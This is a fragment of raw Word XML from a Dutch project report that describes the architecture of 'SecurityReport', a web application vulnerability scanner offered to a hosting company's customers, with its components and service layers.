          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252622848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0051741B" wp14:editId="3DFDE5A0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1900555</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1388745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="819150" cy="72263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 cy="72263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764160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A73532C" wp14:editId="5A2BE905">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4412615</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3222625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="581025" cy="408940"/>
            <wp:effectExtent l="50800" t="76200" r="53975" b="73660"/>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46" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="895232">
                      <a:off x="0" y="0"/>
                      <a:ext cx="581025" cy="40894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509184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D06DF6F" wp14:editId="75C7FB3F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>433705</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3046730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="701040" cy="701040"/>
            <wp:effectExtent l="0" t="0" r="1016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360704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B6028DF" wp14:editId="3E2B1C9A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3228975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1416685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="633730" cy="626745"/>
            <wp:effectExtent l="0" t="0" r="127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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="633730" cy="626745"/>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760064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EA2A151" wp14:editId="2E73CD2F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4307205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1334135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="825500" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:wrapSquare wrapText="bothSides"/>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2816CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252379136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AF90484" wp14:editId="18BC1C85">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>493395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3726180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="674370"/>
                <wp:effectExtent l="0" t="0" r="0" b="11430"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="476" name="Text Box 476"/>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2BA45" w14:textId="2546C6E1" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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0484" id="Text Box 476" o:spid="_x0000_s1059" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:38.85pt;margin-top:293.4pt;width:65pt;height:53.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4912BA45" w14:textId="2546C6E1" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>API</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512256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="598CDC3A" wp14:editId="66DB7B70">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>434975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>988695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2667000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="559" name="Text Box 559"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2667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84A99" w14:textId="0D1B5880" w:rsidR="002A05E5" w:rsidRPr="008A0E3E" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008A0E3E">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>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CDC3A" id="Text Box 559" o:spid="_x0000_s1060" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.25pt;margin-top:77.85pt;width:210pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1AA84A99" w14:textId="0D1B5880" w:rsidR="002A05E5" w:rsidRPr="008A0E3E" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008A0E3E">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Componenten</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410880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01281251" wp14:editId="7BE15BF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>429895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2698115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3365500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="468" name="Text Box 468"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3365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9B3F5" w14:textId="29AE856C" w:rsidR="002A05E5" w:rsidRPr="003F6932" w:rsidRDefault="002A05E5" w:rsidP="004B478D">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003F6932">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Ondersteunende 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81251" id="Text Box 468" o:spid="_x0000_s1061" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.85pt;margin-top:212.45pt;width:265pt;height:27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n5A3kCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7BF9B3F5" w14:textId="29AE856C" w:rsidR="002A05E5" w:rsidRPr="003F6932" w:rsidRDefault="002A05E5" w:rsidP="004B478D">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003F6932">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Ondersteunende Componenten</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81184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40591929" wp14:editId="5B9101F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1830705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3825240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="760095" cy="674370"/>
                <wp:effectExtent l="0" t="0" r="0" b="11430"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="478" name="Text Box 478"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="760095"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5C477" w14:textId="61810C78" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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1929" id="Text Box 478" o:spid="_x0000_s1062" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:144.15pt;margin-top:301.2pt;width:59.85pt;height:53.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25D5C477" w14:textId="61810C78" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>CLI</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85280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B8CB096" wp14:editId="272130AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4308475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3824605</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="685165"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="480" name="Text Box 480"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="8255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98011" w14:textId="52D20C53" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Mai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CB096" id="Text Box 480" o:spid="_x0000_s1063" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:339.25pt;margin-top:301.15pt;width:65pt;height:53.9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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="36998011" w14:textId="52D20C53" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5" w:rsidP="005776D0">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Mail Service</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5824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AD2BE68" wp14:editId="45B5848B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>497840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2228850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="882015" cy="6813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882015"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9FADE" w14:textId="5A5FE504" w:rsidR="002A05E5" w:rsidRPr="00F17F39" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00F17F39">
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rP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BE68" id="Text Box 7" o:spid="_x0000_s1064" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:39.2pt;margin-top:175.5pt;width:69.45pt;height:53.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32E9FADE" w14:textId="5A5FE504" w:rsidR="002A05E5" w:rsidRPr="00F17F39" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F17F39">
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Pandora</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6848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34941113" wp14:editId="0C54696D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1833245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2230755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="764540" cy="68135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76454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9963C" w14:textId="51E7E476" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5">
                            <w:pP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1113" id="Text Box 8" o:spid="_x0000_s1065" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:144.35pt;margin-top:175.65pt;width:60.2pt;height:53.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B59963C" w14:textId="51E7E476" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawl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7872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A84EE8F" wp14:editId="3BCAE254">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3166110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2226945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="674370"/>
                <wp:effectExtent l="0" t="0" r="0" b="11430"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="9" name="Text Box 9"/>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DD562" w14:textId="419B3284" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5">
                            <w:pP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4EE8F" id="Text Box 9" o:spid="_x0000_s1066" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.3pt;margin-top:175.35pt;width:65pt;height:53.1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1BBDD562" w14:textId="419B3284" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Scann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8896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="341CE1CE" wp14:editId="64282A8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4370705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2225040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="6813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95250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2260D" w14:textId="3C9461C7" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>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CE1CE" id="Text Box 10" o:spid="_x0000_s1067" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.15pt;margin-top:175.2pt;width:75pt;height:53.65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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3992260D" w14:textId="3C9461C7" w:rsidR="002A05E5" w:rsidRPr="0045370F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Report</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008A5336">
        <w:t>Dit zijn componenten die de webapplicatie scanner ondersteunen en het mogelijk maken om het vastgestelde doel te bereiken. Een deel van het project context is: de klanten van S5 de mogelijkheid geven om een scan aan te vragen doormiddel van een CMS-extensie. Zonder deze ondersteunende componenten kunnen de klanten geen gebruik maken van SecurityReport.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B3510" w14:textId="77A8ED3A" w:rsidR="00AD1E97" w:rsidRPr="008A5336" w:rsidRDefault="00D03138" w:rsidP="008A5336">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00AD1E97">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC301C8" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D" w:rsidP="00364B0C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E09666" w14:textId="6A2CA6D6" w:rsidR="00D4041C" w:rsidRDefault="00F27919" w:rsidP="00364B0C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252388352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40FA9217" wp14:editId="5E1CA46D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904427</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1122755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="486" name="Rectangle 48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E5D82" id="Rectangle 486" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.2pt;margin-top:-88.35pt;width:25pt;height:1031.7pt;z-index:-25092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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00364B0C">
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00230897">
        <w:t>Concept van het system</w:t>
      </w:r>
      <w:r w:rsidR="00D73A58">
        <w:t xml:space="preserve"> (SecurityReport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B45AA" w14:textId="77777777" w:rsidR="00020CF9" w:rsidRDefault="00020CF9"/>
    <w:p w14:paraId="086ABF16" w14:textId="19108F3D" w:rsidR="00835C4A" w:rsidRDefault="00601227">
      <w:r>
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t xml:space="preserve">systeem wordt een geautomatiseerde </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t xml:space="preserve"> die er moet voor z</w:t>
      </w:r>
      <w:r w:rsidR="006D07BD">
        <w:t>orgen dat</w:t>
      </w:r>
      <w:r w:rsidR="00E319FA">
        <w:t xml:space="preserve"> gebruikers en</w:t>
      </w:r>
      <w:r w:rsidR="006D07BD">
        <w:t xml:space="preserve"> de klanten van S5 </w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t>kosteloze scan</w:t>
      </w:r>
      <w:r w:rsidR="006D07BD">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FC47F9">
        <w:t xml:space="preserve"> kunnen </w:t>
      </w:r>
      <w:r w:rsidR="0069624E">
        <w:t xml:space="preserve">laten uitvoeren op hen </w:t>
      </w:r>
      <w:r w:rsidR="00B67E9B">
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="0069624E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E0C2D">
        <w:t>Het systeem bestaat uit vier</w:t>
      </w:r>
      <w:r w:rsidR="00242008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00835C4A">
        <w:t xml:space="preserve">subsystemen </w:t>
      </w:r>
      <w:r w:rsidR="00242008">
        <w:t>die in dit deel worden behandeld</w:t>
      </w:r>
      <w:r w:rsidR="00835C4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002A05E5">
        <w:t xml:space="preserve"> Gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="00A545D1">
        <w:t>s kunnen een premiumaccount verkrijgen door een betaling, voor de klanten van S5 is deze accounttype kostenloos.</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355E1C08" w:rsidR="003A0936" w:rsidRDefault="002377B1" w:rsidP="003A0936">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252386304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="111E9B43" wp14:editId="78768AD5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>495935</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>119380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4557395" cy="3454400"/>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ysteem lagen.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4557395" cy="3454400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A17B3B" w14:textId="5D919716" w:rsidR="003A0936" w:rsidRDefault="003A0936" w:rsidP="003A0936"/>
    <w:p w14:paraId="79608EB7" w14:textId="77777777" w:rsidR="006277D0" w:rsidRDefault="006277D0"/>
    <w:p w14:paraId="0E4D64C7" w14:textId="77777777" w:rsidR="00002D02" w:rsidRDefault="00002D02"/>
    <w:p w14:paraId="1B956B24" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="308D756A" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="3DDE33AE" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="107181B1" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="6D8910DB" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="3E588C2F" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="6606ACD5" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="29214557" w14:textId="77777777" w:rsidR="002377B1" w:rsidRDefault="002377B1"/>
    <w:p w14:paraId="7C6DEBE6" w14:textId="26A1B12C" w:rsidR="002377B1" w:rsidRDefault="00D03138">
      <w:r>
        <w:tab/>
        <w:t>Figuur 4.2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4530"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00110CAA" w14:paraId="2FFC43A3" w14:textId="77777777" w:rsidTr="0060535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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102B16B0" w14:textId="39CB24B8" w:rsidR="00110CAA" w:rsidRDefault="00110CAA">
            <w:r>
              <w:t>Laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60120FFD" w14:textId="414C68C8" w:rsidR="00110CAA" w:rsidRDefault="00110CAA">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00110CAA" w14:paraId="2866304D" w14:textId="77777777" w:rsidTr="0060535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1" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBB9F2D" w14:textId="641B451C" w:rsidR="00110CAA" w:rsidRDefault="00696791">
            <w:r>
              <w:t>Service laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67D66ED1" w14:textId="04620E4A" w:rsidR="00110CAA" w:rsidRDefault="006457F7" w:rsidP="00B47461">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Deze laag zorgt voor dat de data opgeslagen, geüpdatet en opgehaald kan worden. </w:t>
            </w:r>
            <w:r w:rsidR="00B47461">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="002A38E3">
              <w:t>CRUD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
